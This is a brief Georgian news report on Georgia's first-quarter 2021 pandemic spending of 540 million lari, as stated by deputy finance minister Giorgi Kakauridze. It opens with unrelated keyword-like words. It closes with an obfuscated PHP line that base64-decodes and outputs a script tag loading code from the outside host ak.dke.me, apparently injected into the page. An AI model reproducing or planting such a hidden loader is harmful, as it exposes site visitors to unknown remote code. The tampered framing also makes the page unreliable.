celsiusi
ავერსი შნაიდერი
2021 წლის პირველ კვარტალში პანდემიასთან ბრძოლისთვის 540 მლნ ლარი დაიხარჯა, - ამის შესახებ ფინანსთა მინისტრის მოადგილემ გიორგი კაკაურიძემ აგრარულ საკითხთა კომიტეტის სხდომაზე განაცხადა, სადაც 2021 წლის სახელმწიფო ბიუჯეტის 3 თვის შესრულების ანგარიშით წარსდგა.
 
„რაც შეეხება პანდემიასთან დაკავშირებული ღონისძიებების დაფინანსებას, პირველ კვარტალში ჯამურად მიემართა 540 მლნ ლარი, მათ შორის 176 მლნ იყო მიმართული ჯანდაცვაზე, მოსახლების სოციალურ დაცვაზე მიემართა 212 მლნ ლარი, ხოლო ბიზნესის მხარდაჭერის კუთხით 150 მლნ ლარი“, - განაცხადა კაკაურიძემ.
2144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");